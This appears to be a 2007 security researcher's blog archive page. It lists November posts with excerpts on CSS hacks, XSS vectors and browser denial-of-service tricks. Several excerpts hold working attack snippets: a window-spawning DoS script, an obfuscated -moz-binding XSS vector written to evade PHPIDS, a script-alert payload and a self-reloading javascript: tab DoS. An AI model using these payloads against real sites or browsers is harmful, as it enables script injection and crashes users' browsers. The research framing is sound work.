Hacking CSS is a great challenge and can lead to interesting results, I’ve reignited my interest thanks to sirdarckcat and Thornmaker who have done some fantastic work. I wanted a way to do animation and loops in pure CSS and I think it’s sorta possible using meta refresh. I know meta refresh is slightly cheating […]
Archives for the Month of November, 2007
CSS toggle buttons
Thursday, 29 November 2007
Thornmaker has improved my CSS logic script which is much neater and requires less styles, good work π Sirdarckcat has also created multiplication which is amazing stuff, so I had a bit of spare time and I decided to see if it was possible to create toggles in CSS with a visual appearance of a […]
Browser window spawning DOS
Wednesday, 28 November 2007
This causes DOS in the latest Safari and maybe other browsers too. I tried it in Opera and it does create loads of tabs but seems stable enough to close it down. Enjoy! π <script type="text/javascript"> window.onload = function() { setInterval(‘spawn()’,1); } function spawn() { frm = document.createElement(‘form’); frm.target = ‘x’ + Math.round(Math.random() * 100000); […]
CSS logic
Tuesday, 27 November 2007
Inspired by the great work of Sirdarckcat on CSK2, I’ve decided to produce a POC which performs basic logic in pure CSS. The example simply adds the numbers together depending on which checkbox you check. My next experiment will be with loops and then we can start creating some really cool games in CSS π […]
Latest security news
Tuesday, 27 November 2007
There’s some really awesome stuff going on at the moment, I thought I’d mention a few in case you’re not aware of them. PHPIDS This is such a great project because so many talented people have been involved and have tried to hack the system. The code has moved on tremendously from the first version […]
Ultimate XSS CSS injection
Monday, 26 November 2007
Here’s a final XSS CSS vector which works on IE7 and Firefox. The IE7 vector was based on the brilliant work of Martin which I modified slightly and found that IE will also accept htmlentities in css styles. Credits update The expression part of this technique was first demonstrated by Dan on the slackers forums, […]
htmlentities is badly designed
Monday, 26 November 2007
When someone uses htmlentities I’ve seen it time and time again that they expect that it filters variables from all XSS. This is wrong of course because the function requires a second parameter ENT_QUOTES which correctly replaces quote characters. Some developers aren’t even aware that quotes can lead to XSS injection. This leads me to […]
Awesome XSS
Saturday, 24 November 2007
Hacking the PHPIDS again I found some cool XSS:- <div/style=\-\mo\z\-b\i\nd\in\g:\url(//business \i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)> I’ve moved it onto two lines for correct display. Who’d have thought that Firefox would allow all that within the url and CSS properties π
WebFu crouching tab hidden dos
Friday, 23 November 2007
Hello my student here I’ll show you the way of the tiger, if a deadly Firefox ninja approaches your dojo with a XSS punch:- "><script>alert(/XSS PUNCH!/)</script> Then you can respond with the crouching tab hidden dos move:- self.location = “javascript:window.open(‘javascript:document.clear(); document.open();document.close();self.location=self.location’)”; This move can frustrate your opponent into submission.
Tag inspector
Thursday, 22 November 2007
I’ve been trying to automate the stuff that I normally do when XSS testing to make it easier than writing custom scripts each time. This worked really well for my fuzzing script which fuzzed random characters embedded into tags to find unusual combinations of characters. I’ve done the same again but this time it inspects […]